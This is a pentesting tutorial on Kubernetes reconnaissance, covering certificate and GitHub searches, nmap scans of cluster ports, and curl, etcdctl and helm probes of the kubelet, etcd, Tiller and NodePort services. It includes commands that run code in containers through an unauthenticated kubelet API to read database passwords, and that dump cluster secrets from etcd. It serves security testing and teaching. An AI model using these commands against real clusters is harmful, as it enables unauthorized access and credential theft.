Practical Kubernetes Pentest. Searching for Open Source Resources

The Kubernetes container orchestration platform has seen widespread adoption in recent years, and there are many reasons for this.

First, there are all the advantages that containers themselves provide: the ability to build a microservice architecture, where the application is split into separate components, each running in its own container and implementing its piece of functionality independently of the rest of the solution. Containers also make more efficient use of hardware, and they are convenient wherever several identical instances of an application need to be deployed, for example when moving from a development environment to a testing environment.

Finally, containers make the application architecture more secure by isolating individual components: if one microservice is compromised, the attacker should not (at least in theory) be able to escape the container and take over the containerization environment.

When the number of servers running containers grows to several dozen or more, a tool for centrally managing the containerization nodes becomes necessary, and this is where Kubernetes comes to the rescue. With it, you can deploy multiple instances of an application, automatically maintain the required number of replicas, update the many microservices the application consists of transparently for its users, differentiate access to different container instances, and much more.

Thus, Kubernetes is essentially the foundation of the entire infrastructure on which the application runs, and how securely the application operates depends to a large extent on how correctly the orchestration environment itself is configured.

Of course, you can implement various security mechanisms, such as the role-based access model we discussed earlier, but you can only judge how well a system is protected by trying to follow the hacker's path, that is, trying to hack it. In real life, this task is usually performed by so-called “white hat hackers” – pentesters. In this article, we will try to look at Kubernetes security through the eyes of pentesters.

First, reconnaissance

Traditionally, attackers start by gathering information from open sources, and Kubernetes is no exception. Knowing which domains belong to an organization and which cloud providers' services it uses, you can search for the relevant subdomains with queries like Identity LIKE “k8s.%.com” on specialized resources such as crt.sh, which, in addition to information about the certificates in use, will also show the subdomains associated with Kubernetes.
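
The same data can also be pulled from crt.sh's JSON interface and filtered locally. A minimal sketch, assuming a hypothetical target domain example.com (%25 is simply the URL-encoded % wildcard):

# Query crt.sh for all certificates issued for *.example.com and
# keep only the host names that mention k8s
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' \
  | sort -u \
  | grep -i 'k8s'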

Knowing the domains used will help the hacker understand which components of the service being attacked are running directly in the Kubernetes environment. Let's take, for example, a client-server application whose server part is hosted in the cloud. If the address of this part matches the address of the subdomain we found in the previous step, then this is a sure sign that the application is running in a containerization environment managed by Kubernetes.

Developers (like other IT professionals) are generally quite lazy, and if someone has already done at least part of the work for them, they will gladly take advantage of it. Therefore, if an attacker knows which services and components the application is built on, he can try to search GitHub for YAML files for these services.

Let's look at a small example. Suppose that, thanks to an incorrect web server configuration, we have access to the phpinfo.php file, from which we learned that the target application runs on Nginx and uses PHP 7. Now we can go to GitHub and, using queries like “k8s nginx php 7”, try to find a ready-made set of YAML files describing the creation and deployment of all the entities needed to run these services.

There won't be too many results, and not all of them will contain the necessary files, but if we're lucky and find the set of files the developers actually used, at a minimum we'll learn which components interact with each other (ports, services, protocols), and at best there may be vulnerabilities in the settings and/or in the software used that we can try to exploit.
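
Purely for illustration, a manifest found this way might look roughly like the fragment below (all names, images and ports here are made up). Even such a small file already tells an attacker which images and versions are in use and on which ports the components listen:

# Hypothetical example of a deployment manifest an attacker hopes to find on GitHub
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web-frontend
spec:
  replicas: 2
  selector:
    matchLabels:
      app: web-frontend
  template:
    metadata:
      labels:
        app: web-frontend
    spec:
      containers:
      - name: nginx
        image: nginx:1.19        # exact versions make it easy to match known CVEs
        ports:
        - containerPort: 80
      - name: php-fpm
        image: php:7.4-fpm
        ports:
        - containerPort: 9000
---
apiVersion: v1
kind: Service
metadata:
  name: web-frontend
spec:
  type: NodePort               # exposed on every node in the 30000-32767 range
  selector:
    app: web-frontend
  ports:
  - port: 80
    nodePort: 30080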

Remember about ports

Another ancient but still working method is scanning network ports. Of course, you shouldn't expect all of the ports listed below to be exposed to the Internet, although Shodan may well find something open. However, if we already have access to an internal network that is not very well segmented, port scanning may well bring results.

Below is a list of ports with brief explanations. It is unlikely that all of them will be open, but during a pentest it is quite possible to encounter a situation where some of them are. In that case, it is important to understand what you can try to do with each of them.

The following ports are open for incoming connections on Kubernetes management components:

6443/TCP - Kubernetes API server (kube-apiserver)
2379-2380/TCP - etcd server client API (used by kube-apiserver and etcd)
10250/TCP - Kubelet API (self, control plane)
10259/TCP - kube-scheduler
10257/TCP - kube-controller-manager

The following ports will be open on worker nodes:

10250/TCP - Kubelet API
10256/TCP - kube-proxy (health checks for load balancers)
30000-32767/TCP - NodePort Services

There are also a number of auxiliary services designed to monitor the health of k8s components, so in the example below we will poll a few more ports; for instance, we will also check the legacy insecure API port 8080, just in case.

To quickly search the network for open k8s ports only, and to avoid creating too much unnecessary noise in the traffic, we will scan it with Nmap, specifying only the ports we need:

nmap -p 443,2379,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,44134 <pod_ipaddress>/16

If the port scan produces a non-zero result, or, more simply put, we find open ports, we can try to see what is running on them using curl.

For a node discovered this way, such a check would look like this:

curl -k https://192.168.49.2:8443/api/v1

So, we have done our reconnaissance and have been able to locate Kubernetes nodes. Now we need to try to find and exploit vulnerabilities in the configuration and components of the orchestration environment.

In this article, we will not consider the Kubernetes architecture in detail, as there are already enough publications devoted to this topic. So, we will immediately move on to searching for vulnerabilities in k8s components.

Kubelet API

The kubelet service runs on every cluster node and manages the pods on that node. The Kubelet API is what the main kube-apiserver component communicates with. An important point is that, by default, HTTP requests that are not rejected by any configured authentication method are treated as anonymous access and are assigned the username system:anonymous in the system:unauthenticated group. Accordingly, if you find this service open, you may be able to execute arbitrary code.

Let's try to find available resources using curl. For example, you can look at the metrics:

curl -k https://192.168.49.2:10250/metrics

Or working pods:

curl -k https://192.168.49.2:10250/pods

If we get “Unauthorized” in response, then we are out of luck and authentication is required. But if we get some JSON in response, then we can try to do something interesting.

To start, you can get a list of all pods running on a node:

curl -sk https://192.168.49.2:10250/runningpods/

Next, you can try to execute the commands you need inside the containers. Having received the list of pods running on the node, we may find something interesting, for example a DBMS. Let's try to read the contents of its root directory:

curl -k -XPOST "https://192.168.49.2:10250/run/default/mysql-epg0f/mysql" -d "cmd=ls -la /"

The password for the DBMS can be found using OS environment variables:

curl -k -XPOST "https://192.168.49.2:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'

Code reviewers may also find the Kubelet source code interesting; it can be fetched from:

curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go 

So, we have outlined the main attack vector. But what if there are dozens of nodes and hundreds of different pods? In that case, we can resort to a small script that composes the curl requests from data obtained with kubectl:

# Ask the API server for each node's IP address and kubelet port,
# then print a ready-to-run curl command for every node
kubectl get nodes -o custom-columns="IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port" | grep -v KUBELET_PORT |
while IFS='' read -r node; do
    hst=$(echo "$node" | awk '{print $1}')   # node IP address
    prt=$(echo "$node" | awk '{print $2}')   # kubelet port (usually 10250)
    echo "curl -k --max-time 30 https://$hst:$prt/pods"
done

As you can see, kubectl is used here to build a curl request to the kubelet API of each node.
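
The script only prints the curl commands; a minimal way to actually run them (assuming the script above has been saved under a hypothetical name such as enum-kubelet.sh) is to pipe its output back into the shell:

# Execute the generated requests; kubelets that allow anonymous access
# will answer with JSON pod listings instead of "Unauthorized"
bash enum-kubelet.sh | bash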

Etcd API

Recall that etcd is the database of a Kubernetes cluster and a critical element of it: it stores all the information the cluster needs for stable operation, so it would be rather unpleasant if an attacker gained access to it.

If you have access to port 2379, you can also access the etcd database using curl:

curl -k https://192.168.49.2:2379/version

etcdctl --endpoints=https://192.168.49.2:2379 get / --prefix --keys-only
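
If the endpoint really does answer unauthenticated requests, the most interesting keys live under /registry, where, among other things, Kubernetes stores its secrets. A minimal sketch, assuming the same open endpoint as above:

# Dump the secrets of the default namespace straight from etcd
# (objects are stored under /registry/secrets/<namespace>/<name>;
# the output is protobuf-serialized unless encryption at rest is enabled)
etcdctl --endpoints=https://192.168.49.2:2379 get /registry/secrets/default --prefix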

To automate the etcd search, you can slightly modify the example from the previous section to access port 2379:

# Reuse the node list from kubectl, but probe the etcd client port instead
# (only the IP column is actually used here)
kubectl get nodes -o custom-columns="IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port" | grep -v KUBELET_PORT |
while IFS='' read -r node; do
    hst=$(echo "$node" | awk '{print $1}')   # node IP address
    echo "curl -k --max-time 30 https://$hst:2379/version"
done

This way we can discover nodes with etcd service available.

Helm and others

So far we've talked about discovering and using components of k8s itself. Now let's look at discovering and using an interesting additional component: Helm.

Helm is a popular package manager for K8s that greatly simplifies installing, managing and scaling applications in a cluster. Helm 2 uses the Tiller service, which listens on port 44134 (TCP). Accordingly, if we find this port open, we can try to talk to it with the helm client. In the example below, we find out the Helm version:

helm --host 192.168.49.2:44134 version
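
If Tiller answers, the same client can also enumerate the releases deployed in the cluster, which usually reveals application names and namespaces. A sketch, assuming the same unauthenticated Tiller endpoint (Helm 2 syntax):

# List every release Tiller knows about, including deleted and failed ones
helm --host 192.168.49.2:44134 ls --all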

Another interesting service is cAdvisor, an open-source tool for monitoring the health of containers. It reads the performance characteristics and resource usage of the containers running in a cluster. The service listens on port 4194 (TCP), and an open port can be queried with curl:

curl -k https://192.168.49.2:4194

NodePort Service

We already mentioned NodePort services when we talked about the ports opened on the cluster's worker nodes. A NodePort service opens the same port on every node, and traffic arriving on that port is forwarded to the service. By default, the port is allocated from the range 30000–32767. As a result, new and possibly unreviewed services become reachable directly through these ports.

You can search for these services separately using nmap:

sudo nmap -sS -p 30000-32767 192.168.49.2
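
Anything nmap reports as open in this range is worth probing further. A minimal sketch that extracts the open ports from the nmap output and requests each one over plain HTTP (many NodePort services will, of course, speak other protocols):

# Probe every open NodePort found by nmap and show the first lines of each response
for p in $(sudo nmap -sS -p 30000-32767 192.168.49.2 | awk -F/ '/open/ {print $1}'); do
    echo "== port $p =="
    curl -sk --max-time 5 "http://192.168.49.2:$p" | head -n 5
done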

Let's sum it up

In this article, we haven't hacked anything yet, as our main goal was to first identify the Kubernetes components themselves and their placement on the network, and then try to identify services on open ports for subsequent attack development. In the next article, we'll look at some methods of exploiting vulnerabilities in k8s settings and its components.
